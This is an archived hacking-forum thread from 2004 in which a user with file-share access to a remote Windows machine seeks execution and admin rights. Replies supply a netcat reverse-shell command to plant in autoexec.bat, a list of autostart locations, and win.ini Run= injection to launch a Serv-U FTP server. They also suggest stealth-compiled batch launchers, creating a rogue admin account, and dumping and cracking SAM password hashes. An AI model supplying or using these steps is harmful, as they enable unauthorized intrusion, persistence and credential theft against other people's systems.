hi
i have access to c$ / d$ and admin$ on my box, can upload see and download every file, but have no rights to execute, is there any possibility to get this rights with downloading sommething of this system perhaps to get admin axx ?!
help would be very n1 !!
mfg
Full Version: One Stupid Question
psexec?
i said that i can´t execute ;o( what do you mean ?!
ooo....such angry people on this forum :>
if you can wait untill the box reboots, you could place a file inside the
startup folder, which is a technique used by worms like BugBear.....
other than that and the obvious exploitation of open netbios vulnerabilities....no, i
don't think so ;p
if you can wait untill the box reboots, you could place a file inside the
startup folder, which is a technique used by worms like BugBear.....
other than that and the obvious exploitation of open netbios vulnerabilities....no, i
don't think so ;p
First of all, there are no stupid questions, just stupid people.
There is an answer to your question:
You just put your commands in autoexec.bat and wait till the pc reboots. A well performed google search should provide you with more information.
that way you could set up a netcat listening on your pc
nc -l -p9999 -vv
and include this command in autoexec.bat
nc your.ip 9999 -e cmd.exe
This should give you a cmd shell when the pc reboots. (You would have to upload nc.exe first).
I hope this helps,
Gilbert
There is an answer to your question:
You just put your commands in autoexec.bat and wait till the pc reboots. A well performed google search should provide you with more information.
that way you could set up a netcat listening on your pc
nc -l -p9999 -vv
and include this command in autoexec.bat
nc your.ip 9999 -e cmd.exe
This should give you a cmd shell when the pc reboots. (You would have to upload nc.exe first).
I hope this helps,
Gilbert
Conntect to the box with dameware Utililities
An psexec like shell is included.
I guess u have pass and login ? If u have that it is plain simple netbios hack.
An psexec like shell is included.
I guess u have pass and login ? If u have that it is plain simple netbios hack.
hehe not so easy guys....
1.) i am not stupid
2.) port 139 is closed and netbios is off.....
3.) cause of 2.) dameware nt does not work
4.) i have a non administration axx
5.) i have c$ and d$ and admin$ access to the machine but not to every folder....
6.) have full upload and download winnt directory root..
7.) if i would place a netcat.bat in the startup folder which startup folder do i have to use ?? default user ??
8.) psexec = not enough permissions ! access denied !
you see that it is not that kind of easy.....
mfg
sense
1.) i am not stupid
2.) port 139 is closed and netbios is off.....
3.) cause of 2.) dameware nt does not work
4.) i have a non administration axx
5.) i have c$ and d$ and admin$ access to the machine but not to every folder....
6.) have full upload and download winnt directory root..
7.) if i would place a netcat.bat in the startup folder which startup folder do i have to use ?? default user ??
8.) psexec = not enough permissions ! access denied !
you see that it is not that kind of easy.....
mfg
sense
yeah,
use dameware or psexec..
that nc works too or just create a .bat in on C: and let that execute on startup
then if you search this forum you can enter commands in that bat to make another admin user.. etc.
like that you can login with your own password.. and give yourself exec rights
use dameware or psexec..
that nc works too or just create a .bat in on C: and let that execute on startup
then if you search this forum you can enter commands in that bat to make another admin user.. etc.
like that you can login with your own password.. and give yourself exec rights
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
| QUOTE (nolimit @ Jun 24 2004, 11:33 AM) |
| If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords. |
would be quite difficult to do this without exec rights
but you can try this
| CODE |
| net user Administrator * |
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said its your box so that would't be a problem
| QUOTE (allik @ Jun 24 2004, 11:58 AM) | ||||
would be quite difficult to do this without exec rights but you can try this
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said its your box so that would't be a problem |
yes but how to do this without shell ?!
| QUOTE |
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords |
no chance because of missing exec rights...... !! i have no ftp access only through \\server\c$
mfg
damn your right my fault
so you have to do the method with reboot
so you have to do the method with reboot
| QUOTE (allik @ Jun 24 2004, 12:54 PM) |
| damn your right my fault so you have to do the method with reboot |
yes but there is still the question which startup folder i have to use !!
this folder ?
\\server\c$\Documents and Settings\Default User\Menu Démarrer\Programmes\Démarrage
or this one ?
\\server\c$\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
The following are files that programs can autostart from on bootup:
1. c:\autoexec.bat
2. c:\config.sys
3 . windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8 . windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT C:\wont\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
1. c:\autoexec.bat
2. c:\config.sys
3 . windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8 . windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT C:\wont\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
| QUOTE (dont-staY @ Jun 24 2004, 01:32 PM) |
| The following are files that programs can autostart from on bootup: 1. c:\autoexec.bat 2. c:\config.sys 3 . windir\wininit.ini 4. windir\winstart.bat 5. windir\win.ini - [windows] "load" 6. windir\win.ini - [windows] "run" 7. windir\system.ini - [boot] "shell" 8 . windir\system.ini - [boot] "scrnsave.exe" 9. windir\dosstart.bat 10. windir\system\autoexec.nt 11. windir\system\config.nt All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at: Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup Windows NT C:\wont\Profiles\All Users\Start Menu\Programs\Startup Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup |
so i can put my netcat.exe and netcat.bat into the all user startup folder ?????
or should i only add a shortcut to the startup folder and the files perhaps into the system32 folder ?!
p.s.: cant find the winstart.bat and dosstart.bat on the system !!!!!
hm, no upload access to Documents and Settings ;o( any other idea what to do ?!
Get that (filtered) sam file! Rip the bitch from C:\WINNT\Repair shove it on your own box, pwdump the password hashes and crack the fuckers with LC mother (filtered) 4!
Peace
Peace
Sorry man I'm feelin wierd 
fucki* access denied on the sam file o_O
just do it like that
echo start c:\mynetcatpath\nc.exe>>c:\windir\win.ini
then wait/hope for reboot and your netcat is started
echo start c:\mynetcatpath\nc.exe>>c:\windir\win.ini
then wait/hope for reboot and your netcat is started
you mean to netcat.bat !!??? echo without cmd ?! interesting.........
i can open and save the win.ini file... so what do i exactly have to add there ??!
i can open and save the win.ini file... so what do i exactly have to add there ??!
[Edit]
Erf, you can edit the Win.ini ... type [windows], or under the [windows]section, type "Run=yourexe.exe", in this case the command for netcat, read before
In the next startup, netcat will be run and give you a shell
[/edit]
Well...
Can you modify the Win.ini ? Or The system.ini ?
If you can, just upload your netcat, create a bat wich you compile into a .exe ( no shell used in this manner ) ( Use StealthBatch to compile it into an exe ), type the command [boot] or [windows] followed by your file ( nclaunch.exe, why not ) and it will make a stealth load of your exe ...
Another try, can you modify YOUR system.ini, upload and then replace the remote file ? It's an idea....
Erf, you can edit the Win.ini ... type [windows], or under the [windows]section, type "Run=yourexe.exe", in this case the command for netcat, read before
In the next startup, netcat will be run and give you a shell [/edit]
Well...
Can you modify the Win.ini ? Or The system.ini ?
If you can, just upload your netcat, create a bat wich you compile into a .exe ( no shell used in this manner
) ( Use StealthBatch to compile it into an exe ), type the command [boot] or [windows] followed by your file ( nclaunch.exe, why not ) and it will make a stealth load of your exe ...Another try, can you modify YOUR system.ini, upload and then replace the remote file ? It's an idea....
kk, now win.ini looks like this........
; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......
correct or wrong ?!
; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......
correct or wrong ?!
So much effort from so many people that wanted to help for one f****d servu?Weird... 
| QUOTE (strasharo @ Jun 27 2004, 05:48 PM) |
| So much effort from so many people that wanted to help for one f****d servu?Weird... |
its just a simple ftp, and one of the smallest... why not to get ftp root ?!
| QUOTE |
So much effort |
yes, and i am very happy about it.... but such a post like yours is really (filtered)** up.. and doesn´t help.... so go home to your mummi and flame there..
Blah,better close your mouth.I`m bored of serv-u kids jumping around and making havoc...So better go to dig some potatoes...
Blah,better close your mouth.I`m bored of serv-u kids jumping around and making havoc...So better go to dig some potatoes...
| QUOTE (strasharo @ Jun 27 2004, 05:48 PM) |
| So much effort from so many people that wanted to help for one f****d servu?Weird... |
I don't know how you work, Strasharo, but I'm here to help people and make them projects works, not to say "Sh***, this iz an useless topic, whY do u help him ?"...
I think your post is useless, in fact... or, maybe you want to make people angry, them, continue like this, but I really think this is useless...
Well, his projetc works ? He have a root access on the boxe ? Well, if it does, i think the topic can be terminated... but posting to say "if i was in your shoes, i might not help him"... it's stupid ... let him do what he want, and let us do what we want, if we have time to loose for other people and help them, I think it's better than have time to loose to don't help people and say what you say ...
That's all, I can go out, now...
Edit : Hu, and I'm bored about people that tell them better than other and don't help others...
Forget my English, it's not my native language...
why do people get upsed about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.
So why not help eachother, if you don't like the thread, --> dont reply?
So why not help eachother, if you don't like the thread, --> dont reply?
| QUOTE (cougar @ Jun 28 2004, 11:56 PM) |
| why do people get upsed about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers. So why not help eachother, if you don't like the thread, --> dont reply? |
thats my opinion too. just wanna have ftp root access so i want to do it this way...
but what about my winini mmodification, is it now correct or wrong ?!
| QUOTE |
; for 16-bit app support [fonts] [windows] Run=c:\servu\servu.exe <-------- servu 2.5 exe file [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ..... ...... |
greetz
try it at home 
| QUOTE (brOmstar @ Jul 4 2004, 09:39 AM) |
| try it at home |
just want to be sure that my system starts correctly ,because i don´t wanna use the whole day to set up a new win2000 server
hmmmmmmm
something to win.ini and system.ini
my system has got win2000. and the win.ini and the system.ini are for 16 bit support! does win2000 use these things ?!
what can i put into autoexec.bat ?! o_O
mfg
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
